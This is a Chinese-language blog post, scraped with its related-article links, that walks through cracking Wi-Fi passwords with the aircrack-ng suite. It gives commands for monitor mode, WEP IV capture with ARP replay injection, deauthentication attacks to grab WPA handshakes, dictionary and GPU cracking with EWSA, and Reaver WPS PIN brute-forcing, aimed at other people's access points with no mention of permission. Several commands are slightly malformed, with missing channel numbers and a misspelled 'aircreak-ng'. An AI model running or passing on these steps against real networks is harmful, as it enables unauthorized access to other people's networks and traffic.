有一段时间没有写博客了。只能说苦逼学生党伤不起啊,还好没挂~废话不说了,近期将会讲讲无线PJ那点事,也不是啥干货,就一些先前的笔记分享把。

0.无线网卡

想要提高破解效率,一块猛一点的USB无线网卡是前提的,那是必须的,居家旅行必备嘛。额的就是主流8187的,外加9D全向天线,很给力!当然,额还有一块迷你的TL-WN722N,也不错!

关于无线网卡芯片的相关知识,可以看看freebuf上的一篇科普. 由于本本内置的无线网卡大都不支持数据包注入,而USB外置无线网卡既可以方便移动(天线位置很重要!),又可以加延长线,所以多用大功率的USB网卡。

1.WEP破解

WEP算是比较老的无线加密标准了,现在基本已经摒弃不用了,因为WEP的破解是100%的,这很不安全。

这里使用著名的无线审计套件Aircreak-ng(官网)进行WEP的PJ。当然还有基于Aircreak-ng核心开发的CDLinux,它内置了几款图形化自动PJ软件,比如minidwep-gtk,也就是传说中的“水滴”,那基本就是一键化的操作了。。。

查看网络配置:

# ifconfig

找到需要激活的无线网卡并激活(这里我的是wlan0):

# ifconfig wlan0 up

设置无线网卡为监听状态(mon0):

# airmon-ng start wlan0

监听环境中的无线网络状态:

# airodump-ng mon0

此时会显现周围环境中的所有可见无线网络信号:(关于解决无线SSID隐藏问题将在以后介绍)

进入无线网络抓包状态:

# airodump-ng --ivs -w akast -c  mon0

参数解释:--ivs 只存储接受到的IVS数据包
-w 后面接保存ivs数据包的文件名
-c 频道选择,大都是6,1或11频道的
这会儿理论上只要抓到足够数量(2W以上)就可以进行数据包PJ了,但是为了加快抓包速度,可以采用ARP request注入的方式来加快抓包速度:
# aireplay-ng - -b AP_MAC -h Client_MAC mon0

参数解释:-3 进行3次arp注入攻击
-b 即BSSID,无线AP的MAC地址
-h set source 即需要攻击的目标客户端MAC地址
经过几分钟的抓包,基本可以确保抓到了足够熟练的IVs包,开始破解:
# aircrack-ng akast-.ivs

这里需要说明的是上面保存的是文件名为akast的ivs数据包,但实际保存的数据包有几个而且命名有点不同,但额们需要只是*-01.ivs文件。一段时间就可以PJ出来密码了。

2.WPA/WPA2破解

WPA简介:WPA(WiFi Protected Access)即WiFi网络安全存取。WPA作为一种大大提高无线网络的数据保护和接入控制的增强安全性级别,基本可以解决WEP所不能解决的安全问题。其使用TKIP(暂时密钥完整性协议)。使用的密钥与网络上每一台设备的MAC地址及一个更大的初始化向量合并,以使每一个节点都使用一个不同的密钥流对其数据进行加密。随后,会使用TKIP协议通过RC4加密算法进行数据加密。但是基于RC4加密算法存在漏洞,所以WPA加密也是可以PJ的。WPA2是WPA的升级版,其采用更高级的AES加密标准,但现在WPA同样支持AES加密。在进行扫描探测中,常会出现AES、AES-CCMP或者CCMP来指代AES的启动。

基本启动命令:

# ifconfig wlan0 up
# airmon-ng start wlan0
# airodump-ng mon0
开始捕获无线数据包:
# airodump-ng --ivs -w akast -c  mon0
发起Deauth攻击,以捕获握手包:
# aireplay-ng -0  -a AP_MAC -c Client_MAC mon0
注意:-0(是‘零’),3表示攻击次数,-a 即bssid
正常情况下,在右上角看到了 WPA handshake提示后,表示抓到了握手包,开始破解WPA-PSK:
# aircreak-ng -w dic akast*.cap
注释:-w 后面接字典文件,akast*.cap是指以.cap结尾的数据包文件
字典文件可以到网上下载,也可以自己制作,建议使用专门的社工字典生成器生成,总之,一个靠谱一点的字典很重要!!!
kali下可以使用find命令查找系统中内置的字典文件:1.find / -name *.dic 2.find / -name *.lst

关于.cap无线数据包的破解,建议把.cap无线数据包拷贝到windows下,使用破解神奇EWSA。EWSA是个windows平台下对aircrack-ng抓到的wpa的数据包进行破译的工具,而且对于字典功能支持是很强大的,其支持多字典与GPU破解功能,可以提高破解的速度( 大楷2500/s,是Linux下是5-6倍)。

顺便简述一下使用方法:

 
3. 开启WPS的破解
关于WPS:WPS(WiFi Protected Setup,WiFi保护设置),主要致力于简化无线网络的安全加密设置,使得无线连接变得更简单,但是正是因为这种简单才使得基于WPS的PJ成为可能。在现在之前的大多数路由器都存在WPS漏洞,原因是PIN码的结构本身所致(关于PIN码的具体验证原理可以GOOGLE去),加之多数路由器对PIN码的认证没有次数的限制,并且大多数路由器默认情况下是开启WPS的,这就使得针对WPS的攻击容易执行。能够进行WPS破解的前提是AP必须开启了QSS、WPS功能!额们可以在扫描AP的时候判断目标AP是否开启了QSS、WPS功能,如上面截图,使用airodump-ng扫描时候在MB栏(红色框)中后面有个“.”的就是。
这里也是用著名无线安全审计工具reaver,它在kali里被放在了无线压力测试里了,可见它也是一个无线攻击工具。
当然在minidwep-gtk(minidwep-gtk是一个aircrack-ng的GUI前端,同时支持Reaver的pin破解wps免去了我们进行无线破解时手动输入命令的烦恼。)
里已经内置了Reaver的功能:

如果已经知道PIN码,可以使用Reaver直接秒P:
# reaver -i mon0 -b AP_MAC -p PIN

正常情况下使用Reaver来穷举来PJ,pin码是一个8位数前四位是随机生成的而后4位是3个数字加1个checksum大大降低了穷举所需要的时间。

# reaver -i mon0 -b AP_MAC -vv

基本上关于无线PJ就是这些了,当然在此PJ过程中还是存在各种奇技淫巧的,下次将会继续分享~
												

无线破解那点事(PJ)的更多相关文章

  1. 【原创】无线破解Aircrack-ng套件详解--airmon-ng与airodump-ng

    一:Aircrack-ng详解 1.1 Aircrack-ng概述 Aircrack-ng是一款用于破解无线802.11WEP及WPA-PSK加密的工具,该工具在2005年11月之前名字是Aircra ...

  2. 【原创】无线破解Aircrack-ng套件详解(一)--airmon-ng与airodump-ng

    一:Aircrack-ng详解 1.1 Aircrack-ng概述 Aircrack-ng是一款用于破解无线802.11WEP及WPA-PSK加密的工具,该工具在2005年11月之前名字是Aircra ...

  3. 如何让你的手机U盘集PE工具、系统安装、无线破解等众多功能于一身

    不久前,手里的U盘坏了,于是乎,又在网上淘了一个Type-C U盘,刚好手机电脑都可以用. 那么现在U有了,我们要做什么呢? 第一:让U盘插在手机上时,可以供手机读写,实现手机存储扩容,随插随用,简单 ...

  4. 802.11协议帧格式、Wi-Fi连接交互过程、无线破解入门研究

    相关学习资料 Linux黑客大曝光: 第8章 无线网络 无线网络安全攻防实战进阶 无线网络安全 黑客大曝光 第2版 http://zh.wikipedia.org/wiki/IEEE_802.11 h ...

  5. 利用linux BT5来破解无线 破解无线

    下面是自己整理的详细步骤,版权小冯全部. 一.提前准备好bt5的ISO镜像文件.和虚拟机,提前把虚拟机安装好.然后进行安装bt5. 二.进入页面,点击statx.进入可视化界面. 三.进入主界面后.下 ...

  6. Aircrack-ng无线破解总结

    过年回来家,奈何没网,实属无奈,只好看破解教程,看能否破出来.于是总结如下 测试环境在linux平台下,我用的是ubuntu环境.ubuntu安装可以直接用sudo apt-get install a ...

  7. CDlinux无线破解系统

    cdlinux是一款功能非常强大的无线密码破解器,cdlinux兼容pin软件,不用抓取握手包.不用跑字典.不用客户端在线就能够破解无线路由器的密码,轻轻松松帮助用户达到蹭网的目的. 基本简介 cdl ...

  8. aircrack-ng无线破解实验

    查看无线网卡 airmon-ng 开启网卡监听模式 airmon-ng start wlan0 扫描附近的wifi airodump-ng wlan0mon 停止扫描: ctrl c 使用airodu ...

  9. (24)python 无线破解

    import pywifi import time wifi = pywifi.PyWiFi() # iface = wifi.interfaces()[0]#获取第一块网卡 #print(iface ...

随机推荐

  1. pgsql的同步须知

    pgsql的同步模式是根据master上的日志来做的同步,有两种同步方式,参考http://www.chinaxing.org/articles/Postgres/2012/12/14/2012-12 ...

  2. JavaWeb的过滤器Filter

    Filter的作用是在请求到达web资源(HTML.css.Servlet.Jsp)之前拦截,做一个预处理. 创建一个类实现Filter接口,在web.xml中对文件进行配置 <filter&g ...

  3. 微软开源rDSN分布式系统开发框架

    摘要:微软亚洲研究院系统组开发的分布式系统开发框架——Robust Distributed System Nucleus(rDSN)正式在GitHub平台开源.据悉,rDSN是一个旨在为广大分布式系统 ...

  4. 安卓控件获取器uiautomatorviewer初体验:"unable to connect to the adb. check if adb is installed correctly"

    解决方法:转自:https://plus.google.com/108487870030743970488/posts/2TrMqs1ZGQv Challenge Accepted:1. Screen ...

  5. 关于RouterOS 国内DDNS服务

    虽然RouterOS 加入了cloud功能,但最近在配置RB2011的时候发现不好使,更新域名后无法正确解析到我的IP地址,虽然在cloud的public address中显示了正确的公网ip地址,但 ...

  6. 通过 Lua 扩展 NGINX 实现的可伸缩的 Web 平台OpenResty®

    OpenResty® 是一个基于 Nginx 与 Lua 的高性能 Web 平台,其内部集成了大量精良的 Lua 库.第三方模块以及大多数的依赖项.用于方便地搭建能够处理超高并发.扩展性极高的动态 W ...

  7. 535. Encode and Decode TinyURL

    ▶ 要求给出一种对 URL 网址进行压缩和解压的算法,例如 https://leetcode.com/problems/design-tinyurl ←→ http://tinyurl.com/4e9 ...

  8. vlc框架流程解析(转)

    原文地址:http://luzefengoo.blog.163.com/blog/static/1403593882012754481846/ 第二部分 程序框架实现 1. 播放列表文件src/pla ...

  9. nodepad++快捷键

    在用notepad++进行代码编辑的过程中,其实notepad++也可以进行单行.多行.区块注释和取消注释的....... 快捷键如下: 单行.多行注释              //方式       ...

  10. UnityEngine.SerializeField & System.Serializable

    [UnityEngine.SerializeField] Force Unity to serialize a private field. 强制Unity序列化一个私有变量. You will al ...